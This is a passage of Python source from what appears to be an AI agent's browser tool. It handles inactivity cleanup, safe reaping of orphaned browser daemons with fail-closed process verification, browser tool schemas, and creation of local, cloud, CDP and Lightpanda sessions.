through to ``os.environ``.
|
|
"""
|
|
owner_home = _session_owner_homes.get(task_id)
|
|
if owner_home is None:
|
|
yield
|
|
return
|
|
|
|
from agent.secret_scope import (
|
|
build_profile_secret_scope,
|
|
reset_secret_scope,
|
|
set_secret_scope,
|
|
)
|
|
from hermes_cli.env_loader import hydrate_profile_secret_sources
|
|
|
|
home_token = set_hermes_home_override(owner_home)
|
|
try:
|
|
hydrate_profile_secret_sources(Path(owner_home))
|
|
secret_token = set_secret_scope(build_profile_secret_scope(Path(owner_home)))
|
|
try:
|
|
yield
|
|
finally:
|
|
reset_secret_scope(secret_token)
|
|
finally:
|
|
reset_hermes_home_override(home_token)
|
|
|
|
|
|
def _cleanup_inactive_browser_sessions():
|
|
"""Close sessions inactive longer than the timeout (called by the cleanup thread).
|
|
|
|
Each session is torn down under its owner profile's scope. A session whose
|
|
cleanup keeps failing is force-reaped after MAX_INACTIVITY_CLEANUP_FAILURES
|
|
attempts instead of retrying forever; only a successful cleanup clears its
|
|
failure count.
|
|
"""
|
|
current_time = time.time()
|
|
sessions_to_cleanup = []
|
|
|
|
with _cleanup_lock:
|
|
for task_id, last_time in list(_session_last_activity.items()):
|
|
if current_time - last_time > BROWSER_SESSION_INACTIVITY_TIMEOUT:
|
|
sessions_to_cleanup.append(task_id)
|
|
|
|
for task_id in sessions_to_cleanup:
|
|
elapsed = int(current_time - _session_last_activity.get(task_id, current_time))
|
|
logger.info("Cleaning up inactive session for task: %s (inactive for %ss)", task_id, elapsed)
|
|
try:
|
|
with _session_owner_scope(task_id):
|
|
cleanup_browser(task_id)
|
|
with _cleanup_lock:
|
|
_session_last_activity.pop(task_id, None)
|
|
_session_owner_homes.pop(task_id, None)
|
|
_cleanup_failures.pop(task_id, None)
|
|
except Exception as e:
|
|
with _cleanup_lock:
|
|
failures = _cleanup_failures[task_id] = _cleanup_failures.get(task_id, 0) + 1
|
|
if failures < MAX_INACTIVITY_CLEANUP_FAILURES:
|
|
logger.warning("Error cleaning up inactive session %s (attempt %d/%d): %s",
|
|
task_id, failures, MAX_INACTIVITY_CLEANUP_FAILURES, e)
|
|
continue
|
|
logger.error("Browser cleanup failed %d times for inactive session %s; "
|
|
"force-reaping: %s", failures, task_id, e)
|
|
try:
|
|
with _session_owner_scope(task_id):
|
|
_force_reap_browser_session(task_id)
|
|
except Exception as reap_exc:
|
|
logger.error("Force-reap of browser session %s failed: %s", task_id, reap_exc)
|
|
finally:
|
|
with _cleanup_lock:
|
|
_session_owner_homes.pop(task_id, None)
|
|
_cleanup_failures.pop(task_id, None)
|
|
|
|
|
|
def _write_owner_pid(socket_dir: str, session_name: str) -> None:
|
|
"""Record the current hermes PID as the owner of a browser socket dir.
|
|
|
|
Written atomically to ``<socket_dir>/<session_name>.owner_pid`` so the
|
|
orphan reaper can distinguish daemons owned by a live hermes process
|
|
(don't reap) from daemons whose owner crashed (reap). Best-effort —
|
|
an OSError here just falls back to the legacy ``tracked_names``
|
|
heuristic in the reaper.
|
|
"""
|
|
try:
|
|
path = os.path.join(socket_dir, f"{session_name}.owner_pid")
|
|
with open(path, "w", encoding="utf-8") as f:
|
|
f.write(str(os.getpid()))
|
|
except OSError as exc:
|
|
logger.debug("Could not write owner_pid file for %s: %s",
|
|
session_name, exc)
|
|
|
|
|
|
def _verify_reapable_browser_daemon(daemon_pid: int, socket_dir: str,
|
|
session_name: str) -> bool:
|
|
"""Confirm a live PID is genuinely *this* session's agent-browser daemon.
|
|
|
|
The ``.pid`` file lives in a world-writable, predictably-named temp dir and
|
|
is written by the daemon, not us: a same-user actor can plant one pointing
|
|
at a victim PID, or a recycled PID can land on an unrelated process — and
|
|
reaping is a *tree* kill, i.e. an arbitrary-process DoS. Two psutil checks
|
|
must both pass: (1) identity — ``agent-browser`` in the name or cmdline;
|
|
(2) binding — the socket dir path/basename in the cmdline, or
|
|
``AGENT_BROWSER_SOCKET_DIR`` in its environ. (2) is the real spoof defense:
|
|
an attacker would need a real daemon embedding this exact path, which they
|
|
could already signal. Fail-closed on any ambiguity (unreadable cmdline, no
|
|
match): refuse to reap and leave process and socket dir alone.
|
|
"""
|
|
try:
|
|
import psutil
|
|
except ImportError: # psutil is a hard dep; defensive only
|
|
logger.warning(
|
|
"Refusing to reap browser daemon PID %d (session %s): "
|
|
"psutil unavailable for identity verification",
|
|
daemon_pid, session_name)
|
|
return False
|
|
|
|
try:
|
|
proc = psutil.Process(daemon_pid)
|
|
name = (proc.name() or "").lower()
|
|
cmdline = " ".join(proc.cmdline() or []).lower()
|
|
except psutil.NoSuchProcess:
|
|
# Vanished between the liveness check and now — nothing to reap.
|
|
return False
|
|
except (psutil.AccessDenied, OSError) as exc:
|
|
logger.warning(
|
|
"Refusing to reap browser daemon PID %d (session %s): "
|
|
"could not read process identity (%s)",
|
|
daemon_pid, session_name, exc)
|
|
return False
|
|
|
|
looks_like_browser = "agent-browser" in name or "agent-browser" in cmdline
|
|
if not looks_like_browser:
|
|
logger.warning(
|
|
"Refusing to reap PID %d (session %s): not an agent-browser "
|
|
"process (name=%r)", daemon_pid, session_name, name)
|
|
return False
|
|
|
|
# Binding check: the live process must reference *this* socket dir.
|
|
socket_dir_l = socket_dir.lower()
|
|
socket_base_l = os.path.basename(socket_dir).lower()
|
|
bound = socket_dir_l in cmdline or (
|
|
socket_base_l and socket_base_l in cmdline)
|
|
if not bound:
|
|
try:
|
|
env_dir = (proc.environ() or {}).get(
|
|
"AGENT_BROWSER_SOCKET_DIR", "")
|
|
bound = bool(env_dir) and os.path.normpath(env_dir) == \
|
|
os.path.normpath(socket_dir)
|
|
except (psutil.AccessDenied, psutil.NoSuchProcess, OSError):
|
|
# environ() can be denied even same-user on some platforms.
|
|
# cmdline already failed to bind — fail closed.
|
|
bound = False
|
|
|
|
if not bound:
|
|
logger.warning(
|
|
"Refusing to reap agent-browser PID %d: not bound to session "
|
|
"socket dir %s (possible recycled PID or planted pid file)",
|
|
daemon_pid, socket_dir)
|
|
return False
|
|
|
|
return True
|
|
|
|
|
|
def _socket_dir_idle_seconds(socket_dir: str) -> Optional[float]:
|
|
"""Seconds since anything in ``socket_dir`` was last written; None if unknown (fail safe).
|
|
|
|
Every command writes ``_stdout_<cmd>`` / ``_stderr_<cmd>`` there, so the
|
|
newest mtime is a last-activity marker that survives hermes restarts and
|
|
lost in-memory bookkeeping. The dir's own mtime is not enough — rewriting
|
|
an existing ``_stdout_click`` doesn't touch it — so entries are scanned too.
|
|
"""
|
|
try:
|
|
latest = os.path.getmtime(socket_dir)
|
|
except OSError:
|
|
return None
|
|
|
|
try:
|
|
with os.scandir(socket_dir) as entries:
|
|
for entry in entries:
|
|
try:
|
|
latest = max(latest, entry.stat().st_mtime)
|
|
except OSError:
|
|
continue
|
|
except OSError:
|
|
pass # dir mtime alone is still a usable lower bound
|
|
|
|
return max(0.0, time.time() - latest)
|
|
|
|
|
|
def _owner_pid_alive(socket_dir: str, session_name: str) -> Tuple[Optional[int], Optional[bool]]:
|
|
"""Read ``<session>.owner_pid`` and report ``(pid, alive)``; ``(None, None)`` when missing/corrupt."""
|
|
owner_pid_file = os.path.join(socket_dir, f"{session_name}.owner_pid")
|
|
if not os.path.isfile(owner_pid_file):
|
|
return None, None
|
|
try:
|
|
owner_pid = int(Path(owner_pid_file).read_text(encoding="utf-8").strip())
|
|
# ``os.kill(pid, 0)`` is NOT a no-op on Windows; use the cross-platform check.
|
|
from gateway.status import _pid_exists
|
|
return owner_pid, _pid_exists(owner_pid)
|
|
except (ValueError, OSError):
|
|
return None, None # corrupt file — fall through to legacy handling
|
|
|
|
|
|
def _reap_socket_dir(socket_dir: str, session_name: str, tracked_names: set) -> bool:
|
|
"""Reap one ``agent-browser-<session>`` dir if orphaned; return True when a daemon was killed.
|
|
|
|
Ownership priority: (1) a live ``owner_pid`` means another hermes process
|
|
owns it — leave it alone UNLESS it is untracked here and idle past
|
|
``BROWSER_ORPHAN_GRACE_SECONDS`` (owner-alive alone made leaked daemons
|
|
immortal: in-memory tracking is lost on any exception path and the daemon's
|
|
own idle timeout doesn't fire when it is wedged); (2) no owner_pid (legacy)
|
|
falls back to this process's tracking. A pidless dir is only stale after the
|
|
grace period — deleting it immediately races the creator's first stdout open.
|
|
The daemon PID is verified as ours before a tree-kill (world-writable dir,
|
|
recycled PIDs), and refused without a start-time fingerprint.
|
|
"""
|
|
owner_pid, owner_alive = _owner_pid_alive(socket_dir, session_name)
|
|
if owner_alive is True:
|
|
if session_name in tracked_names:
|
|
return False
|
|
idle_s = _socket_dir_idle_seconds(socket_dir)
|
|
if idle_s is None or idle_s < BROWSER_ORPHAN_GRACE_SECONDS:
|
|
return False # unknown age or within grace — fail safe
|
|
logger.warning(
|
|
"Browser session %s has a live owner (PID %s) but is untracked "
|
|
"and idle for %ds (grace %ds) — treating as leaked and reaping",
|
|
session_name, owner_pid, int(idle_s),
|
|
BROWSER_ORPHAN_GRACE_SECONDS)
|
|
elif owner_alive is None and session_name in tracked_names:
|
|
return False
|
|
|
|
pid_file = os.path.join(socket_dir, f"{session_name}.pid")
|
|
if not os.path.isfile(pid_file):
|
|
idle_s = _socket_dir_idle_seconds(socket_dir)
|
|
if idle_s is None or idle_s < BROWSER_ORPHAN_GRACE_SECONDS:
|
|
return False
|
|
shutil.rmtree(socket_dir, ignore_errors=True)
|
|
return False
|
|
|
|
try:
|
|
daemon_pid = int(Path(pid_file).read_text(encoding="utf-8").strip())
|
|
except (ValueError, OSError):
|
|
shutil.rmtree(socket_dir, ignore_errors=True)
|
|
return False
|
|
|
|
from gateway.status import _pid_exists
|
|
if not _pid_exists(daemon_pid):
|
|
shutil.rmtree(socket_dir, ignore_errors=True)
|
|
return False
|
|
|
|
if not _verify_reapable_browser_daemon(daemon_pid, socket_dir, session_name):
|
|
return False # leave process and dir for a later sweep once the imposter PID is gone
|
|
|
|
# Tree-kill so Chromium children (renderer, GPU, ...) go too, not just the daemon.
|
|
reaped = False
|
|
try:
|
|
from gateway.status import get_process_start_time
|
|
from tools.process_registry import ProcessRegistry
|
|
daemon_start = get_process_start_time(daemon_pid)
|
|
if daemon_start is None:
|
|
logger.warning(
|
|
"Refusing to reap browser daemon PID %d (session %s): "
|
|
"no start-time fingerprint available", daemon_pid, session_name)
|
|
return False
|
|
ProcessRegistry._terminate_host_pid(daemon_pid, daemon_start)
|
|
logger.info("Reaped orphaned browser daemon PID %d (session %s)",
|
|
daemon_pid, session_name)
|
|
reaped = True
|
|
except (ProcessLookupError, PermissionError, OSError):
|
|
pass
|
|
shutil.rmtree(socket_dir, ignore_errors=True)
|
|
return reaped
|
|
|
|
|
|
def _reap_orphaned_browser_sessions():
|
|
"""Kill agent-browser daemons whose owning hermes process is gone.
|
|
|
|
When the process that created a session exits uncleanly (SIGKILL, crash,
|
|
gateway restart) the in-memory ``_active_sessions`` tracking is lost but the
|
|
node + Chromium processes keep running. Scans the tmp dir for
|
|
``agent-browser-*`` socket dirs and applies ``_reap_socket_dir``'s ownership
|
|
rules (owner_pid file first — cross-process safe, two hermes instances never
|
|
reap each other — then in-process tracking for legacy daemons).
|
|
Safe to call from any context — atexit, cleanup thread, or on demand.
|
|
"""
|
|
import glob
|
|
|
|
# Lightpanda servers (Browser Use mode) keep their own records (no
|
|
# agent-browser socket dir); sweep them with the same owner-liveness rule
|
|
# BEFORE the daemon scan, which may return early.
|
|
try:
|
|
from tools.browser_lightpanda import reap_orphaned_lightpanda
|
|
|
|
reap_orphaned_lightpanda()
|
|
except Exception as e:
|
|
logger.debug("Lightpanda orphan reap failed: %s", e)
|
|
|
|
tmpdir = _socket_safe_tmpdir()
|
|
socket_dirs = []
|
|
for prefix in ("agent-browser-h_*", "agent-browser-cdp_*", "agent-browser-hermes_*"):
|
|
socket_dirs += glob.glob(os.path.join(tmpdir, prefix))
|
|
if not socket_dirs:
|
|
return
|
|
|
|
with _cleanup_lock:
|
|
tracked_names = {
|
|
info.get("session_name")
|
|
for info in _active_sessions.values()
|
|
if info.get("session_name")
|
|
}
|
|
|
|
reaped = 0
|
|
for socket_dir in socket_dirs:
|
|
session_name = os.path.basename(socket_dir).removeprefix("agent-browser-")
|
|
if session_name and _reap_socket_dir(socket_dir, session_name, tracked_names):
|
|
reaped += 1
|
|
|
|
if reaped:
|
|
logger.info("Reaped %d orphaned browser session(s) from previous run(s)", reaped)
|
|
|
|
|
|
def _browser_cleanup_thread_worker():
|
|
"""Every 30s: close sessions idle past BROWSER_SESSION_INACTIVITY_TIMEOUT.
|
|
|
|
Also reaps orphaned daemons on startup AND every BROWSER_ORPHAN_REAP_INTERVAL
|
|
seconds — a daemon can fall out of in-memory tracking at any point in a
|
|
long-lived process, and a startup-only reap could never recover from that.
|
|
"""
|
|
reap_every_cycles = max(1, round(BROWSER_ORPHAN_REAP_INTERVAL / 30))
|
|
cycle = 0
|
|
|
|
while _cleanup_running:
|
|
# cycle 0 is the startup reap; then every reap_every_cycles.
|
|
if cycle % reap_every_cycles == 0:
|
|
try:
|
|
_reap_orphaned_browser_sessions()
|
|
except Exception as e:
|
|
logger.warning("Orphan reap error: %s", e)
|
|
cycle += 1
|
|
|
|
try:
|
|
_cleanup_inactive_browser_sessions()
|
|
except Exception as e:
|
|
logger.warning("Cleanup thread error: %s", e)
|
|
|
|
# Sleep in 1-second intervals so we can stop quickly if needed
|
|
for _ in range(30):
|
|
if not _cleanup_running:
|
|
break
|
|
time.sleep(1)
|
|
|
|
|
|
def _start_browser_cleanup_thread():
|
|
"""Start the background cleanup thread if not already running."""
|
|
global _cleanup_thread, _cleanup_running
|
|
|
|
with _cleanup_lock:
|
|
if _cleanup_thread is None or not _cleanup_thread.is_alive():
|
|
_cleanup_running = True
|
|
_cleanup_thread = threading.Thread(
|
|
target=_browser_cleanup_thread_worker,
|
|
daemon=True,
|
|
name="browser-cleanup"
|
|
)
|
|
_cleanup_thread.start()
|
|
logger.info("Started inactivity cleanup thread (timeout: %ss)", BROWSER_SESSION_INACTIVITY_TIMEOUT)
|
|
|
|
|
|
def _stop_browser_cleanup_thread():
|
|
"""Stop the background cleanup thread."""
|
|
global _cleanup_running
|
|
_cleanup_running = False
|
|
if _cleanup_thread is not None:
|
|
_cleanup_thread.join(timeout=5)
|
|
|
|
|
|
def _update_session_activity(task_id: str):
|
|
"""Update the last activity timestamp for a session.
|
|
|
|
Also records the owning Hermes home on first sight so the process-global
|
|
janitor can tear the session down under its owner's scope. An
|
|
activity touch deliberately does NOT reset ``_cleanup_failures`` — only a
|
|
successful cleanup does.
|
|
"""
|
|
with _cleanup_lock:
|
|
_session_last_activity[task_id] = time.time()
|
|
_session_owner_homes.setdefault(task_id, str(get_hermes_home()))
|
|
|
|
|
|
# Register cleanup thread stop on exit
|
|
atexit.register(_stop_browser_cleanup_thread)
|
|
|
|
|
|
# ============================================================================
|
|
# Tool Schemas
|
|
# ============================================================================
|
|
|
|
BROWSER_TOOL_SCHEMAS = [
|
|
{
|
|
"name": "browser_navigate",
|
|
"description": "Navigate to a URL in the browser. Initializes the session and loads the page. Must be called before other browser tools. For simple information retrieval, prefer web_search or web_extract (faster, cheaper). For plain-text endpoints — URLs ending in .md, .txt, .json, .yaml, .yml, .csv, .xml, raw.githubusercontent.com, or any documented API endpoint — prefer curl via the terminal tool or web_extract; the browser stack is overkill and much slower for these. Use browser tools when you need to interact with a page (click, fill forms, dynamic content). Returns a compact page snapshot with interactive elements and ref IDs — no need to call browser_snapshot separately after navigating.",
|
|
"parameters": {
|
|
"type": "object",
|
|
"properties": {
|
|
"url": {
|
|
"type": "string",
|
|
"description": "The URL to navigate to (e.g., 'https://example.com')"
|
|
}
|
|
},
|
|
"required": ["url"]
|
|
}
|
|
},
|
|
{
|
|
"name": "browser_snapshot",
|
|
"description": "Get a text-based snapshot of the current page's accessibility tree. Returns interactive elements with ref IDs (like @e1, @e2) for browser_click and browser_type. full=false (default): compact view with interactive elements. full=true: complete page content. Snapshots over 15000 chars are truncated or LLM-summarized; when that happens the complete snapshot is saved to a file and the output includes its path so you can page through the rest with read_file. Requires browser_navigate first. Note: browser_navigate already returns a compact snapshot — use this to refresh after interactions that change the page, or with full=true for complete content.",
|
|
"parameters": {
|
|
"type": "object",
|
|
"properties": {
|
|
"full": {
|
|
"type": "boolean",
|
|
"description": "If true, returns complete page content. If false (default), returns compact view with interactive elements only.",
|
|
"default": False
|
|
}
|
|
},
|
|
"required": []
|
|
}
|
|
},
|
|
{
|
|
"name": "browser_click",
|
|
"description": "Click on an element identified by its ref ID from the snapshot (e.g., '@e5'). The ref IDs are shown in square brackets in the snapshot output. Requires browser_navigate and browser_snapshot to be called first.",
|
|
"parameters": {
|
|
"type": "object",
|
|
"properties": {
|
|
"ref": {
|
|
"type": "string",
|
|
"description": "The element reference from the snapshot (e.g., '@e5', '@e12')"
|
|
}
|
|
},
|
|
"required": ["ref"]
|
|
}
|
|
},
|
|
{
|
|
"name": "browser_type",
|
|
"description": "Type text into an input field identified by its ref ID. Clears the field first, then types the new text. Requires browser_navigate and browser_snapshot to be called first.",
|
|
"parameters": {
|
|
"type": "object",
|
|
"properties": {
|
|
"ref": {
|
|
"type": "string",
|
|
"description": "The element reference from the snapshot (e.g., '@e3')"
|
|
},
|
|
"text": {
|
|
"type": "string",
|
|
"description": "The text to type into the field"
|
|
}
|
|
},
|
|
"required": ["ref", "text"]
|
|
}
|
|
},
|
|
{
|
|
"name": "browser_scroll",
|
|
"description": "Scroll the page in a direction. Use this to reveal more content that may be below or above the current viewport. Requires browser_navigate to be called first.",
|
|
"parameters": {
|
|
"type": "object",
|
|
"properties": {
|
|
"direction": {
|
|
"type": "string",
|
|
"enum": ["up", "down"],
|
|
"description": "Direction to scroll"
|
|
}
|
|
},
|
|
"required": ["direction"]
|
|
}
|
|
},
|
|
{
|
|
"name": "browser_back",
|
|
"description": "Navigate back to the previous page in browser history. Requires browser_navigate to be called first.",
|
|
"parameters": {
|
|
"type": "object",
|
|
"properties": {},
|
|
"required": []
|
|
}
|
|
},
|
|
{
|
|
"name": "browser_press",
|
|
"description": "Press a keyboard key. Useful for submitting forms (Enter), navigating (Tab), or keyboard shortcuts. Requires browser_navigate to be called first.",
|
|
"parameters": {
|
|
"type": "object",
|
|
"properties": {
|
|
"key": {
|
|
"type": "string",
|
|
"description": "Key to press (e.g., 'Enter', 'Tab', 'Escape', 'ArrowDown')"
|
|
}
|
|
},
|
|
"required": ["key"]
|
|
}
|
|
},
|
|
{
|
|
"name": "browser_get_images",
|
|
"description": "Get a list of all images on the current page with their URLs and alt text. Useful for finding images to analyze with the vision tool. Requires browser_navigate to be called first.",
|
|
"parameters": {
|
|
"type": "object",
|
|
"properties": {},
|
|
"required": []
|
|
}
|
|
},
|
|
{
|
|
"name": "browser_vision",
|
|
"description": "Take a screenshot of the current page so you can inspect it visually. Use this when you need to understand what the page looks like - especially for CAPTCHAs, visual verification challenges, complex layouts, or cases where the text snapshot misses important visual information. When your active model has native vision, the screenshot is attached to your context directly and you inspect it on the next turn; otherwise Hermes falls back to an auxiliary vision model and returns a text analysis. Includes a screenshot_path that you can share with the user by including MEDIA:<screenshot_path> in your response. Requires browser_navigate to be called first.",
|
|
"parameters": {
|
|
"type": "object",
|
|
"properties": {
|
|
"question": {
|
|
"type": "string",
|
|
"description": "What you want to know about the page visually. Be specific about what you're looking for."
|
|
},
|
|
"annotate": {
|
|
"type": "boolean",
|
|
"default": False,
|
|
"description": "If true, overlay numbered [N] labels on interactive elements. Each [N] maps to ref @eN for subsequent browser commands. Useful for QA and spatial reasoning about page layout."
|
|
}
|
|
},
|
|
"required": ["question"]
|
|
}
|
|
},
|
|
{
|
|
"name": "browser_console",
|
|
"description": "Get browser console output and JavaScript errors from the current page. Returns console.log/warn/error/info messages and uncaught JS exceptions. Use this to detect silent JavaScript errors, failed API calls, and application warnings. Requires browser_navigate to be called first. When 'expression' is provided, evaluates JavaScript in the page context and returns the result — use this for DOM inspection, reading page state, or extracting data programmatically.",
|
|
"parameters": {
|
|
"type": "object",
|
|
"properties": {
|
|
"clear": {
|
|
"type": "boolean",
|
|
"default": False,
|
|
"description": "If true, clear the message buffers after reading"
|
|
},
|
|
"expression": {
|
|
"type": "string",
|
|
"description": "JavaScript expression to evaluate in the page context. Runs in the browser like DevTools console — full access to DOM, window, document. Return values are serialized to JSON. Example: 'document.title' or 'document.querySelectorAll(\"a\").length'"
|
|
}
|
|
},
|
|
"required": []
|
|
}
|
|
},
|
|
]
|
|
|
|
|
|
# ============================================================================
|
|
# Utility Functions
|
|
# ============================================================================
|
|
|
|
def _create_local_session(task_id: str, allow_real_profile: bool = True) -> Dict[str, str]:
|
|
import uuid
|
|
|
|
# Real-profile consent: attach this local session (via CDP) to the user's
|
|
# browser running on a hermes-owned SNAPSHOT of their real profile, logins
|
|
# included. Fail closed on resolver/launch errors — a consented user must
|
|
# never be silently downgraded to a throwaway. The hybrid private-URL
|
|
# sidecar passes allow_real_profile=False: handing the user's cookie jar to
|
|
# an arbitrary internal host the model chose is a larger, unconsented
|
|
# exposure than the routing rule protects against (and a real-profile
|
|
# failure must not break private-URL routing).
|
|
if allow_real_profile:
|
|
cdp_url, err = _real_profile_cdp()
|
|
if err:
|
|
raise RuntimeError(err)
|
|
if cdp_url:
|
|
session_name = f"rp_{uuid.uuid4().hex[:10]}"
|
|
logger.info(
|
|
"Created real-profile local session %s for task %s", session_name, task_id
|
|
)
|
|
return {
|
|
"session_name": session_name,
|
|
"bb_session_id": None,
|
|
"cdp_url": _resolve_cdp_override(cdp_url),
|
|
"features": {"local": True, "real_profile": True},
|
|
}
|
|
|
|
# Browser Use mode drives whatever CDP endpoint it is handed; with
|
|
# ``browser.engine: lightpanda`` that endpoint is a Hermes-spawned
|
|
# ``lightpanda serve``. The built-in tools never reach this branch —
|
|
# they are hidden in Browser Use mode — and keep driving Lightpanda via
|
|
# ``agent-browser --engine lightpanda`` on the plain local session below.
|
|
if _is_browser_use_cli_mode() and _using_lightpanda_engine():
|
|
return _create_lightpanda_session(task_id)
|
|
|
|
session_name = f"h_{uuid.uuid4().hex[:10]}"
|
|
logger.info("Created local browser session %s for task %s",
|
|
session_name, task_id)
|
|
return {
|
|
"session_name": session_name,
|
|
"bb_session_id": None,
|
|
"cdp_url": None,
|
|
"features": {"local": True},
|
|
}
|
|
|
|
|
|
def _create_lightpanda_session(task_id: str) -> Dict[str, Any]:
|
|
"""Spawn ``lightpanda serve`` for this session key (Browser Use mode)."""
|
|
import uuid
|
|
from tools.browser_lightpanda import launch_lightpanda
|
|
|
|
session_name = f"lp_{uuid.uuid4().hex[:10]}"
|
|
server, err = launch_lightpanda(
|
|
session_name, block_private_networks=not _is_local_backend()
|
|
)
|
|
if err:
|
|
raise RuntimeError(err)
|
|
logger.info(
|
|
"Created Lightpanda session %s (port %s) for task %s",
|
|
session_name, server.port, task_id,
|
|
)
|
|
return {
|
|
"session_name": session_name,
|
|
"bb_session_id": None,
|
|
"cdp_url": server.cdp_url,
|
|
"features": {"local": True, "lightpanda": True},
|
|
}
|
|
|
|
|
|
def _local_backend_process_dead(session_info: Dict[str, Any]) -> bool:
|
|
"""True for a Lightpanda session whose ``lightpanda serve`` is gone."""
|
|
if not (session_info.get("features") or {}).get("lightpanda"):
|
|
return False
|
|
from tools.browser_lightpanda import get_server
|
|
|
|
server = get_server(session_info.get("session_name", ""))
|
|
return server is None or not server.is_alive()
|
|
|
|
|
|
def _create_cdp_session(task_id: str, cdp_url: str) -> Dict[str, str]:
|
|
"""Create a session that connects to a user-supplied CDP endpoint."""
|
|
import uuid
|
|
session_name = f"cdp_{uuid.uuid4().hex[:10]}"
|
|
logger.info("Created CDP browser session %s → %s for task %s",
|
|
session_name, _sanitize_url_for_logs(cdp_url), task_id)
|
|
return {
|
|
"session_name": session_name,
|
|
"bb_session_id": None,
|
|
"cdp_url": cdp_url,
|
|
"features": {"cdp_override": True},
|
|
}
|
|
|
|
|
|
def _create_cloud_session_or_fallback(task_id: str, provider) -> Dict[str, Any]:
|
|
"""Create a cloud session; fall back to local Chromium (marked degraded) on failure.
|
|
|
|
Some cloud providers (Browser-Use v3) return an HTTP CDP discovery URL
|
|
instead of a raw websocket endpoint, so ``cdp_url`` is resolved here.
|
|
"""
|
|
try:
|
|
session_info = provider.create_session(task_id)
|
|
if not session_info or not isinstance(session_info, dict):
|
|
raise ValueError(f"Cloud provider returned invalid session: {session_info!r}")
|
|
if session_info.get("cdp_url"):
|
|
session_info = dict(session_info)
|
|
session_info["cdp_url"] = _resolve_cdp_override(str(session_info["cdp_url"]))
|
|
return session_info
|
|
except Exception as e:
|
|
provider_name = type(provider).__name__
|
|
logger.warning(
|
|
"Cloud provider %s failed (%s); attempting fallback to local "
|
|
"Chromium for task %s",
|
|
provider_name, e, task_id,
|
|
exc_info=True,
|
|
)
|
|
try:
|
|
session_info = _create_local_session(task_id)
|
|
except Exception as local_error:
|
|
raise RuntimeError(
|
|
f"Cloud provider {provider_name} failed ({e}) and local "
|
|
f"fallback also failed ({local_error})"
|
|
) from e
|
|
# Mark session as degraded for observability
|
|
if isinstance(session_info, dict):
|
|
session_info = dict(session_info)
|
|
session_info["fallback_from_cloud"] = True
|
|
session_info["fallback_reason"] = str(e)
|
|
session_info["fallback_provider"] = provider_name
|
|
return session_info
|
|
|
|
|
|
def _create_session_for_key(task_id: str, force_local: bool) -> Dict[str, Any]:
|
|
"""Create a fresh session for ``task_id`` (runs OUTSIDE the lock: cloud mode makes a network call).
|
|
|
|
Precedence: CDP override > hybrid local sidecar > cloud provider > local.
|
|
The hybrid private-URL sidecar NEVER gets the real profile — presenting real
|
|
cookies to an arbitrary LAN host the model routed there is unconsented
|
|
exposure (see ``_create_local_session``).
|
|
"""
|
|
cdp_override = _get_cdp_override()
|
|
if cdp_override and not force_local:
|
|
return _create_cdp_session(task_id, cdp_override)
|
|
if force_local:
|
|
return _create_local_session(task_id, allow_real_profile=False)
|
|
provider = _get_cloud_provider()
|
|
if provider is None:
|
|
return _create_local_session(task_id)
|
|
return _create_cloud_session_or_fallback(task_id, provider)
|
|
def _get_session_info(task_id: Optional[str] = None) -> Dict[str, Any]:
|
|
"""Get or create session info for a session key (thread-safe).
|
|
|
|
``task_id`` may carry the ``::local`` suffix (hybrid local sidecar), which
|
|
forces a local Chromium even when a cloud provider is configured. Also
|
|
starts the inactivity cleanup thread and touches activity tracking.
|
|
Returns a dict with ``session_name`` (always) plus ``bb_session_id`` /
|
|
``cdp_url`` for cloud sessions.
|
|
"""
|
|
if task_id is None:
|
|
task_id = "default"
|
|
|
|
# Start the cleanup thread if not running (handles inactivity timeouts)
|
|
_start_browser_cleanup_thread()
|
|
|
|
# Update activity timestamp for this session
|
|
_update_session_activity(task_id)
|
|
|
|
with _cleanup_lock:
|
|
# Check if we already have a session for this task
|
|
existing_session = _active_sessions.get(task_id)
|
|
|
|
# Suspect-session recycle: a previous command
|
|
# timeout marked this cached session suspect via the SuspectableBackend
|
|
# adapter. ensure_healthy() tears it down here, at next use, and we fall
|
|
# through to create a fresh session — the expensive recycle lives on this
|
|
# path, not on the timeout path (mark must stay cheap).
|
|
if existing_session is not None and not _browser_session_backend(task_id).ensure_healthy():
|
|
# Teardown removes the activity entry; the replacement must be
|
|
# tracked by the inactivity reaper like an initial session.
|
|
_update_session_activity(task_id)
|
|
with _cleanup_lock:
|
|
replacement = _active_sessions.get(task_id)
|
|
if replacement is not None and replacement is not existing_session:
|
|
# Another thread already recycled and re-created it.
|
|
return replacement
|
|
existing_session = None
|
|
|
|
if existing_session is not None:
|
|
if (
|
|
not _session_has_expired(existing_session)
|
|
and not _local_backend_process_dead(existing_session)
|
|
):
|
|
return existing_session
|
|
|
|
logger.info(
|
|
"Replacing expired or dead browser session for task %s",
|
|
task_id,
|
|
)
|
|
_cleanup_single_browser_session(task_id)
|
|
# Cleanup removes the activity entry. The replacement session must be
|
|
# tracked by the inactivity reaper just like an initial session.
|
|
_update_session_activity(task_id)
|
|
|
|
# Guard against a concurrent replacement: another thread may have
|
|
# already cleaned up the expired session and created a fresh one
|
|
# while we were waiting. If so, return the live replacement instead
|
|
# of falling through to create yet another session.
|
|
with _cleanup_lock:
|
|
replacement = _active_sessions.get(task_id)
|
|
if replacement is not None and replacement is not existing_session:
|
|
return replacement
|
|
|
|
# Hybrid routing: session keys ending with ``::local`` force a local
|
|
# Chromium regardless of the globally-configured cloud provider. Public
|
|
# URLs in the same conversation continue to use the cloud session under
|
|
# the bare task_id key.
|
|
force_local = _is_local_sidecar_key(task_id)
|
|
session_info = _create_session_for_key(task_id, force_local)
|
|
|
|
with _cleanup_lock:
|
|
# Double-check: another thread may have created a session while we
|
|
# were doing the network call. Use the existing one to avoid leaking
|
|
# orphan cloud sessions.
|
|
if task_id in _active_sessions:
|
|
return _active_sessions[task_id]
|
|
session_info = dict(session_info)
|
|
session_info.setdefault("session_key", task_id)
|
|
session_info.setdefault("owner_task_id", _bare_task_id_for_session_key(task_id))
|
|
_active_sessions[task_id] = session_info
|
|
# A brand-new session is healthy by definition — drop any stale
|
|
# suspect flag left by a wedged-path eviction of its predecessor.
|
|
_suspect_browser_sessions.pop(task_id, None)
|
|
|
|
# Lazy-start the CDP supervisor now that the session exists (if the
|
|
# backend surfaces a CDP URL via override or session_info["cdp_url"]).
|
|
# Idempotent; swallows errors. See _ensure_cdp_supervisor for details.
|
|
# Skip for local sidecars — they have no CDP URL — and for Lightpanda
|
|
# sessions: those only exist in Browser Use mode, where the browser_*
|
|
# tools that consume supervisor state are hidden, so the supervisor
|
|
# would just hold an idle second CDP connection to the process.
|
|
if not force_local and not (session_info.get("features") or {}).get("lightpanda"):
|
|
_ensure_cdp_supervisor(task_id)
|
|
|
|
return session_info
|
|
|
|
|
|
